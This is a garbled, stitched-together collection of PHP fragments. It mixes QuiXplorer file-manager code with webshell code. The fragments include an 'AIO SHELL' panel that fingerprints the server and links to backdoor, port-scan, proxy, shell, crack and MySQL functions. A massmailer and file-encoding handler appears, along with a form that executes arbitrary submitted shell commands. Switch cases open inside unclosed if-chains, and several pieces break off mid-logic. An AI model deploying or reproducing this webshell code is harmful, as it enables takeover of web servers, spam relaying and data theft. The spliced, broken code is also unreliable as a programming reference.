Have Fun...
------------------------------------------------------------------------------*/
//------------------------------------------------------------------------------
umask(02);
// Added to make created files/dirs group writable
//------------------------------------------------------------------------------
require "./.include/init.php";
// Init
//------------------------------------------------------------------------------
switch ($GLOBALS["action"]) {
// Execute action
//------------------------------------------------------------------------------
// EDIT FILE
case "edit":
require "./.include/fun_edit.php";
edit_file($GLOBALS["dir"], $GLOBALS["item"]);
break;
//------------------------------------------------------------------------------
// DELETE FILE(S)/DIR(S)
//------------------------------------------------------------------------------
// DELETE FILE(S)/DIR(S)
case "delete":
require "./.include/fun_del.php";
del_items($GLOBALS["dir"]);
break;
//------------------------------------------------------------------------------
// COPY/MOVE FILE(S)/DIR(S)
//------------------------------------------------------------------------------
// COPY/MOVE FILE(S)/DIR(S)
case "copy":
case "move":
if (isset($_REQUEST['massmailer'])) {
massmailer_ui();
} else {
if (isset($_REQUEST['rename'])) {
chdir($_GET['path']);
rename_ui();
} else {
if (isset($_GET['old_name']) && isset($_GET['new_name'])) {
chdir($_GET['path']);
rename_bg();
} else {
if (isset($_REQUEST['encodefile'])) {
php_ende_ui();
} else {
if (isset($_REQUEST['edit'])) {
edit_file();
} else {
if (isset($_REQUEST['down']) && isset($_REQUEST['path'])) {
download();
} else {
if (isset($_REQUEST['gzip']) && isset($_REQUEST['path'])) {
download_gzip();
} else {
if (isset($_REQUEST['read'])) {
chdir($_GET['path']);
code_viewer();
} else {
if (isset($_REQUEST['perm'])) {
chdir($_GET['path']);
ch_perm_ui();
} else {
// Initialize
case "DBInitialize":
$scanInfo = array();
$scanInfo['parent'] = $GLOBALS["home_dir"] . DS . JRequest::getString('dir');
$scanInfo['selected'] = JRequest::getVar('selitems');
JRequest::setVar('scanInfo', $scanInfo);
$currentSession = JSession::getInstance('oseantivirus', array());
$currentSession->clear("scanInfo");
$currentSession->set("scanInfo", $scanInfo);
$mainframe->redirect("index.php?option=com_ose_antivirus");
break;
// EDIT FILE
// EDIT FILE
case "edit":
require _QUIXPLORER_PATH . "/include/fun_edit.php";
edit_file($dir, $item);
break;
// VIEW FILE
// VIEW FILE
case 'view':
require _QUIXPLORER_PATH . "/include/fun_view.php";
nx_show_file($dir, $item);
break;
//------------------------------------------------------------------------------
// DELETE FILE(S)/DIR(S)
//------------------------------------------------------------------------------
// DELETE FILE(S)/DIR(S)
case "delete":
require _QUIXPLORER_PATH . "/include/fun_del.php";
del_items($dir);
break;
function aio_main()
{
$uid = posix_getuid();
$user_info = posix_getpwuid($uid);
$uid_banner = "uid=" . $uid . "(" . $user_info['name'] . ") " . "gid=" . $user_info['gid'] . "(" . $user_info['name'] . ") " . "dir=" . $user_info['dir'] . " " . "shell=" . $user_info['shell'];
$uname = posix_uname();
$uname_banner = $uname['sysname'] . " " . $uname['nodename'] . " " . $uname['release'] . " " . $uname['version'] . " " . $uname['machine'];
$server_addr = $_SERVER['SERVER_NAME'];
$server_port = $_SERVER['SERVER_PORT'];
$server_time = date("Y/m/d h:i:s", time());
$phpsoft = $_SERVER['SERVER_SOFTWARE'];
$php_version = PHP_VERSION;
$zend_version = zend_version();
$dis_func = get_cfg_var("disable_functions");
$safemode = @ini_get('safe_mode');
if ($safemode == false) {
$safemode = "On";
}
$cwd_path = getcwd();
$total_disk = disk_total_space("/");
$total_disk_gb = intval($total_disk / (1024 * 1024 * 1024));
$free_disk = disk_free_space("/");
$free_disk_gb = intval($free_disk / (1024 * 1024 * 1024));
echo '<html>
<head>
<style>
body
{
background-color:#FFFFFF;
}
ul.banner
{
list-style-type:none;
margin:0;
padding:0;
text-align:center;
color:#384850;
background-color:gray;
font-size:20px;
font-weight:bold;
}
ul.directory
{
font-size:14px;
text-align:left;
font-weight: bold;
}
li
{
display:inline;
}
a:link
{
color:#384850;
}
a:visited
{
color:#384850;
}
a:hover
{
color:#384850;
}
a:active
{
color:#384850;
}
h2.banner
{
text-align:center;
color:#384850;
font-weight:bold;
}
table.banner
{
font-size:14px;
}
tr.banner
{
font-size:16px;
color:#384850;
background-color:gray;
}
tr.directory
{
font-size:14px;
text-align:left;
height:20px;
border:1px solid #98bf21;
padding:2px 6px 2px 6px;
}
p.banner
{
font-size:14px;
}
</style>
</head>
<body>
<h2 class="banner">PHP AIO SHELL</h2>
<hr />
<table class="banner">
<tr>
<td width="1200" >User: '******'</td>
<td width="200" align="center" >' . $server_time . '</td>
</tr>
<tr>
<td width="1200" >Uname: ' . $uname_banner . '</td>
<td width="200" align="center" >' . $server_addr . ":" . $server_port . '</td>
</tr>
</table>
<hr />
<p class="banner">Software: ' . $phpsoft . ' | PHP: ' . $php_version . ' | ZEND: ' . $zend_version . '
| Safemode: ' . $safemode . ' | disfunc: ' . $dis_func . '
</p>
<table class="banner">
<tr>
<td width="200" align="left">Directroy: ' . $cwd_path . '</td>
<td width="200" >Disk: total ' . $total_disk_gb . 'GB free ' . $free_disk_gb . 'GB </td>
</tr>
</table>
<br />
<ul class="banner">
<li><a href="webshell.php?cmd=dir">[Directorys]</a></li>
<li><a href="webshell.php?cmd=backdoor">[Backdoor]</a></li>
<li><a href="webshell.php?cmd=portscan">[PortScan]</a></li>
<li><a href="webshell.php?cmd=proxy">[Proxy]</a></li>
<li><a href="webshell.php?cmd=shell">[Shell]</a></li>
<li><a href="webshell.php?cmd=crack">[Crack]</a></li>
<li><a href="webshell.php?cmd=mysql">[Mysql]</a></li>
</ul>
<br />
</body>
</html>';
if ($_GET['cmd']) {
if ($_GET['cmd'] == "dir") {
aio_directory();
}
if ($_GET['cmd'] == "backdoor") {
run_backdoor();
}
if ($_GET['cmd'] == "shell") {
aio_shell();
}
if ($_GET['cmd'] == "portscan") {
run_portscan();
}
if ($_GET['cmd'] == "proxy") {
web_proxy_client();
}
}
if ($_GET['delete']) {
delete_file($_GET['delete']);
}
if ($_GET['edit']) {
edit_file($_GET['edit']);
}
}
QuiXplorer v2.5.7 Modified for NAS4Free
------------------------------------------------------------------------------*/
umask(02);
// Added to make created files/dirs group writable
require_once "qx.php";
require "./_include/init.php";
// Init
global $action;
_debug("system_filemanager.php: checking action {$action}");
$current_dir = qx_request("dir", "");
switch ($action) {
// Execute action
// EDIT FILE
case "edit":
require "./_include/edit_editarea.php";
edit_file($current_dir, $GLOBALS["item"]);
break;
// DELETE FILE(S)/DIR(S)
// DELETE FILE(S)/DIR(S)
case "delete":
require "./_include/del.php";
del_items($current_dir);
break;
// COPY/MOVE FILE(S)/DIR(S)
// COPY/MOVE FILE(S)/DIR(S)
case "copy":
case "move":
require "./_include/copy_move.php";
copy_move_items($current_dir);
break;
// DOWNLOAD FILE
# copy file
###############################################################################
if ($filecopy == 1) {
$strOutput .= "<table border=1><tr><td colspan=2><h3>copy file</h3></td></tr>\n\t<form method='post' target='_parent' action=" . $MyLoc . "?" . $SREQ . "&'>\n\t<tr><td>source</td><td><input type=text name='filecopy_source' value='" . $filecopy_source . "'></td></tr>\n\t<tr><td>destination</td><td><input type=text name='filecopy_dest' value='" . $filecopy_dest . "'></td></tr>\n\t<tr><td></td><td><input type=submit></td></tr>\n\t<tr><td colspan=2>" . copy_file($filecopy_source, $filecopy_dest) . "</td></tr>\n\t</form>\n\t</table>";
}
###############################################################################
# edit file
###############################################################################
if ($fileedit == 1) {
$strOutput .= "<table border=1><tr><td colspan=2><h3>edit file</h3></td></tr>\n\t<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>\n\t<tr><td>file</td><td><input type=text name='editfile' value='" . $editfile . "'></td></tr>\n\t<tr><td>edit</td><td><input type='checkbox' name='edit' value='1'></td></tr>\n\t<tr><td>content</td><td><textarea name='editcontent' cols='50' rows='10'>";
if ($edit == 1 | $editfile != $ArrDefaults['editfile']) {
$strOutput .= show_file($editfile);
}
$strOutput .= "</textarea></td></tr>\n\t<tr><td></td><td><input type=submit></td></tr>\n\t<tr><td colspan=2>";
if ($edit == 1 | $editfile != $ArrDefaults['editfile']) {
$strOutput .= edit_file($editcontent, $editfile, $edit);
}
$strOutput .= "</td></tr>\n\t</table>\n\t</form>";
}
###############################################################################
# execute cmd shell NEEDS MODIFINY FOR B64 STATUS!!
###############################################################################
if ($cmdln == 1) {
$emeth = test_cmd_shell();
$strOutput .= "<table border=1><tr><td colspan=2><h3>execute cmd execution: " . $cmdcall . "</h3></td></tr>\n\t<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>\n\t<tr><td>cmd line</td><td><input type=text name='cmdcall' value='" . $cmdcall . "'></td></tr>\n\t<tr><td></td><td><input type=submit></td></tr>\n\t<tr><td>test method with 'pwd'</td><td>" . $Mstr[$emeth] . "</td></tr>\n\t<tr><td colspan=2>";
if ($emeth < 3) {
$strOutput .= "The output of this command will be somewhere on the page!";
Mexec($cmdcall, $emeth);
} else {
$strOutput .= Mexec($cmdcall, $emeth);
}